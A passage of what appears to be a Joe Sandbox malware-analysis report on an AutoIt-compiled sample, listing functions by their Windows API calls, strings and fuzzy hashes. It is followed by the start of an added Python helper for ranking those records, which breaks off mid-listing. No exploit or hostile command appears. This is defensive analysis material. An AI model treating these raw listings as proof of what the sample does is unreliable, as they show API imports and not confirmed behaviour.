                                                                  • _free.LIBCMT ref: 00382FB5
                                                                    • Part of subcall function 0037395C: __FF_MSGBANNER.LIBCMT ref: 00373973
                                                                    • Part of subcall function 0037395C: __NMSG_WRITE.LIBCMT ref: 0037397A
                                                                    • Part of subcall function 0037395C: RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000001,00000000,?,?,0036F507,?,0000000E), ref: 0037399F
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0036EBB2
                                                                    • Part of subcall function 003551AF: _memset.LIBCMT ref: 0035522F
                                                                    • Part of subcall function 003551AF: _wcscpy.LIBCMT ref: 00355283
                                                                    • Part of subcall function 003551AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00355293
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0036EC07
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0036EC16
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C3C88
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003905AC
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003905C7
                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003905DD
                                                                  • FreeLibrary.KERNEL32(?), ref: 00390632
                                                                  Similarity
                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                  • String ID:
                                                                  • API String ID: 3137044355-0
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00396733
                                                                  • _memset.LIBCMT ref: 00396754
                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003967A6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003967AF
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                  • String ID:
                                                                  • API String ID: 1157408455-0
                                                                  APIs
                                                                    • Part of subcall function 0038AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0038AA79
                                                                    • Part of subcall function 0038AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0038AA83
                                                                    • Part of subcall function 0038AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0038AA92
                                                                    • Part of subcall function 0038AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0038AA99
                                                                    • Part of subcall function 0038AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0038AAAF
                                                                  • GetLengthSid.ADVAPI32(?,00000000,0038ADE4,?,?), ref: 0038B21B
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0038B227
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0038B22E
                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 0038B247
                                                                  Similarity
                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                  • String ID:
                                                                  • API String ID: 4217664535-0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0038B498
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0038B4AA
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0038B4C0
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0038B4DB
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0036B5A5
                                                                  • GetClientRect.USER32(?,?), ref: 003CE69A
                                                                  • GetCursorPos.USER32(?), ref: 003CE6A4
                                                                  • ScreenToClient.USER32(?,?), ref: 003CE6AF
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00397352
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00397385
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0039739B
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003973A2
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                  • GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  APIs
                                                                    • Part of subcall function 00377A0D: __getptd_noexit.LIBCMT ref: 00377A0E
                                                                  • __lock.LIBCMT ref: 0037748F
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 003774AC
                                                                  • _free.LIBCMT ref: 003774BF
                                                                  • InterlockedIncrement.KERNEL32(00FA6C28), ref: 003774D7
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 2704283638-0
                                                                  APIs
                                                                    • Part of subcall function 0036AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0036AFE3
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036AFF2
                                                                    • Part of subcall function 0036AF83: BeginPath.GDI32(?), ref: 0036B009
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036B033
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003BEA8E
                                                                  • LineTo.GDI32(00000000,?,?), ref: 003BEA9B
                                                                  • EndPath.GDI32(00000000), ref: 003BEAAB
                                                                  • StrokePath.GDI32(00000000), ref: 003BEAB9
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0038C84A
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0038C85D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0038C864
                                                                  • AttachThreadInput.USER32(00000000), ref: 0038C86B
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 0038B0D6
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0038AC9D), ref: 0038B0DD
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0038AC9D), ref: 0038B0EA
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0038AC9D), ref: 0038B0F1
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0036B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0036B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0036B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0036B4BD
                                                                  • GetWindowDC.USER32(?,00000000), ref: 003CDE2B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 003CDE38
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 003CDE51
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 003CDE6A
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 003CDE8A
                                                                  • ReleaseDC.USER32(?,00000000), ref: 003CDE95
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038B2DF
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 0038B2EB
                                                                  • CloseHandle.KERNEL32(?), ref: 0038B2F4
                                                                  • CloseHandle.KERNEL32(?), ref: 0038B2FC
                                                                    • Part of subcall function 0038AB24: GetProcessHeap.KERNEL32(00000000,?,0038A848), ref: 0038AB2B
                                                                    • Part of subcall function 0038AB24: HeapFree.KERNEL32(00000000), ref: 0038AB32
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0038DEAA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 3565006973-3941886329
                                                                  APIs
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • __wcsnicmp.LIBCMT ref: 0039DEFD
                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0039DFC6
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                  • String ID: LPT
                                                                  • API String ID: 3222508074-1350329615
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcscpy
                                                                  • String ID: I/<$I/<
                                                                  • API String ID: 3048848545-3015493500
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 0036BCDA
                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0036BCF3
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  APIs
                                                                    • Part of subcall function 003544ED: __fread_nolock.LIBCMT ref: 0035450B
                                                                  • _wcscmp.LIBCMT ref: 0039C65D
                                                                  • _wcscmp.LIBCMT ref: 0039C670
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  • API String ID: 4029003684-3121273764
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 003BA85A
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003BA86F
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 003B980E
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003B984A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: 9822029e9bd3561ceedae8e1b57c44b98cc255bc7bef82d03a73ae7023eab7d1
                                                                  • Instruction ID: 36b23a04b4de858273c77ac8257b0d63302cafa3a27895b07ab00a6e7261f09f
                                                                  • Opcode Fuzzy Hash: 9822029e9bd3561ceedae8e1b57c44b98cc255bc7bef82d03a73ae7023eab7d1
                                                                  • Instruction Fuzzy Hash: 6A31AF71110604AEEB129F38CC81BFB77ADFF59764F01861AFAA9C7190CA31AC81C764
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003951C6
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00395201
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: f0cfbc584c8842471ab7557802e7a2f5c98d71b154622a30dc3ca289b90d5c1c
                                                                  • Instruction ID: 689ebf4a901e3766f3c69754740f5edb7dba8d5711cb9839cf93263cede7d3e0
                                                                  • Opcode Fuzzy Hash: f0cfbc584c8842471ab7557802e7a2f5c98d71b154622a30dc3ca289b90d5c1c
                                                                  • Instruction Fuzzy Hash: 2B31B4316007059FEF27CF99D845BAEBBF8EF45350F154829E9C5A61A0E7709A85CB10
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __snwprintf
                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                  • API String ID: 2391506597-2584243854
                                                                  • Opcode ID: b83c763a0ac7cb8247802d027ea32209125217c879d351c0e18841e3fcb5f16d
                                                                  • Instruction ID: 92ec1575af7b0d9028fb8a320000a0f8c1626ad500eaf17b23266feaa47d77e7
                                                                  • Opcode Fuzzy Hash: b83c763a0ac7cb8247802d027ea32209125217c879d351c0e18841e3fcb5f16d
                                                                  • Instruction Fuzzy Hash: 0421A531600218AFCF12EF64C882FAE77B4EF45701F140469F805AF1A1DB74EA49CBA5
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003B945C
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003B9467
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 970aec810264a809bbb19b88f0a2f799a4aa88841fe78acb2cb3337b3bb82640
                                                                  • Instruction ID: 188a0c8a0f66367d799342a473a0c7f94c4aec047dad255e3170935c5b871d3f
                                                                  • Opcode Fuzzy Hash: 970aec810264a809bbb19b88f0a2f799a4aa88841fe78acb2cb3337b3bb82640
                                                                  • Instruction Fuzzy Hash: 351163713101086FEF12DF55DC80FEB376EEB883A8F114126FB199B6A0D6759C528760

APIs
  • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
• GetActiveWindow.USER32 ref: 003BDA7B
• EnumChildWindows.USER32(?,003BD75F,00000000), ref: 003BDAF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: T1:
• API String ID: 3814560230-2493874558
• Opcode ID: 20af6b37e1267f0c28d8e09292540b8233aabb31c8903053e4c5c3f4a1597f02
• Instruction ID: fe7b2e6addad187da5daa1c31220ca37c115b2d8a6cae571998db5d29ae8abd9
• Opcode Fuzzy Hash: 20af6b37e1267f0c28d8e09292540b8233aabb31c8903053e4c5c3f4a1597f02
• Instruction Fuzzy Hash: 79214F39604201DFC716DF28E850AE5B7E9EF49320F254629FA66873E0D731A840CF64

APIs
  • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
  • Part of subcall function 0036D17C: GetStockObject.GDI32(00000011), ref: 0036D1CE
  • Part of subcall function 0036D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
• GetWindowRect.USER32(00000000,?), ref: 003B9968
• GetSysColor.USER32(00000012), ref: 003B9982
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 42768f0003536d693e17e5301cbed81f95ee4e5028440efeecaabc36d96a5e59
• Instruction ID: 545514044abe5d8f90170ac338780ebfc777dbdd3525ce4c5476354e92a8dcb9
• Opcode Fuzzy Hash: 42768f0003536d693e17e5301cbed81f95ee4e5028440efeecaabc36d96a5e59
• Instruction Fuzzy Hash: 9B113772620209AFDB05DFB8DC45EFA7BA8FB09348F014629FA55E3250E735E851DB60

APIs
• GetWindowTextLengthW.USER32(00000000), ref: 003B9699
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003B96A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 1de8b662ee21886881966be32a6a6f896e8d110cd90a40f22d556d22faa38c18
• Instruction ID: 545dcbc9081e31f685e3e695dcac7bc56e9db28b09cdb7bf6b959195226a53f7
• Opcode Fuzzy Hash: 1de8b662ee21886881966be32a6a6f896e8d110cd90a40f22d556d22faa38c18
• Instruction Fuzzy Hash: 4F118871500108AAEB125F68AC40BEB3B6EEB09378F514326FB24965E0C7319C509B60

APIs
• _memset.LIBCMT ref: 003952D5
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003952F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 249501f8a4e580636a4acd794e0155116606d89fbde6ff38d92024650ff3dce5
• Instruction ID: 0270e51e1bebe965c25614da56c6d2162fb4142155ab27357f72cd77768e8a8c
• Opcode Fuzzy Hash: 249501f8a4e580636a4acd794e0155116606d89fbde6ff38d92024650ff3dce5
• Instruction Fuzzy Hash: F211E676901614ABDF23DBA8ED84B9D77B8AB06750F168025E981E72A0D3B0ED84C790

APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003A4DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003A4E1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: fded934d0b39b2532bdcfcec841b2fd375610102157b561f3afd628e22dd42ed
• Instruction ID: 11df90cdab35c06aec4eff44b3f2420424b57d7471d245c13805853726e25211
• Opcode Fuzzy Hash: fded934d0b39b2532bdcfcec841b2fd375610102157b561f3afd628e22dd42ed
• Instruction Fuzzy Hash: 26115A70501221BADB2A8F618899EEBFBACFF97755F20822AF51596540D2B05941C6E0

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003837A7
• ___raise_securityfailure.LIBCMT ref: 0038388E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: (A
• API String ID: 3761405300-2104148225
• Opcode ID: dab07726ff10f15ddad627f02a974ace5046b8b1bb7e598ba4d2da0a4836f58a
• Instruction ID: 54b6f04e08f369dbed2b6b1b8ca47a36158a8651ec4896db56ca2854100b0d09
• Opcode Fuzzy Hash: dab07726ff10f15ddad627f02a974ace5046b8b1bb7e598ba4d2da0a4836f58a
• Instruction Fuzzy Hash: 1F21EFB5510308DAE741DF56FA966843BB5BB48310F10D87AE9088A3A0E3F4A9D0CB4D

APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
• htons.WSOCK32(00000000,?,00000000), ref: 003AA88B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 6b86a52fb5937cf7ff0946669aa452ad031b32b0f8739c8e9549ca863f3af838
• Instruction ID: 346da0356f0a745fe9c5e69bf72c35cc5238672a70de8eaf228f686ccfa6c26a
• Opcode Fuzzy Hash: 6b86a52fb5937cf7ff0946669aa452ad031b32b0f8739c8e9549ca863f3af838
• Instruction Fuzzy Hash: AA014536200304ABCB12AF68C886FADBB6CEF06310F10846BF512AB2D1C775E801C752
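The function records above all share one layout (an APIs list, a Strings list, the Memory Dump Source, and the Similarity block with its API ID, String ID and Opcode ID), and a full report carries hundreds of them, most belonging to the AutoIt runtime's GUI code rather than to anything the sample does on its own. The Python below is an added triage helper, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses records in this layout, strips the "Download File" link text the HTML export fuses onto the Associated lines, ranks each function by the imports it calls so that the WININET and WSOCK32 functions above come out ahead of the SendMessageW and GetMenuItemInfoW ones, and groups functions that share an API String ID (the two GetMenuItemInfoW functions above are such a pair). The SAMPLE text is constructed from records copied from this page; the function names, the weight tables and the choice of which imports to weight are the author's own assumptions, not anything Joe Sandbox computes.

```python
# Added triage helper for the Joe Sandbox "IDA Plugin" function records above; not part of the
# report or of Joe Sandbox. SAMPLE copies records from this page; the weights are assumptions.
import re
from collections import defaultdict, namedtuple

SAMPLE = """\
    APIs
    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003A4DF5
    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003A4E1E
    Memory Dump Source
    • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
    Similarity
    • API ID: Internet$OpenOption
    • String ID: <local>
    • API String ID: 942729171-4266983199
    APIs
    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
    • htons.WSOCK32(00000000,?,00000000), ref: 003AA88B
    Similarity
    • API ID: htonsinet_addr
    APIs
      • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
    • GetSysColor.USER32(00000012), ref: 003B9982
    Similarity
    • API ID: Window$ColorCreateMessageObjectRectSendStock
    APIs
    • _memset.LIBCMT ref: 003951C6
    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00395201
    Similarity
    • API ID: InfoItemMenu_memset
    • API String ID: 2223754486-4108050209
    • Opcode ID: f0cfbc584c8842471ab7557802e7a2f5c98d71b154622a30dc3ca289b90d5c1c
    APIs
    • _memset.LIBCMT ref: 003952D5
    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003952F4
    Similarity
    • API ID: InfoItemMenu_memset
    • API String ID: 2223754486-4108050209
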